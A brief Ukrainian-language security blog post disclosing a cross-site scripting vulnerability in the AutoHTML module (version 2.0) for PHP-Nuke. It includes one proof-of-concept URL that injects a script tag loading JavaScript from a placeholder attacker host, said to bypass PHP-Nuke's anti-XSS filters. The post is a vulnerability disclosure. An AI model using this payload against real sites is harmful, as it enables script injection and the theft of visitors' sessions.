Уразливість в AutoHTML для PHP-Nuke
23:53 29.05.2008Вчора, 28.05.2008, я знайшов Cross-Site Scripting уразливість в модулі AutoHTML для PHP-Nuke. Про Local File Inclusion, Directory Traversal та Information Leakage уразливості в даному модулі для PHP-Nuke я писав раніше.
XSS:
http://site/autohtml.php?filename=%3Cscript%20src=http://hacker_site/xss.js%20
В даному випадку відбувається обхід анти-XSS фільтрів PHP-Nuke.
Уразлива версія PHP-Nuke AutoHTML Module 2.0 (та потенційно інші версії).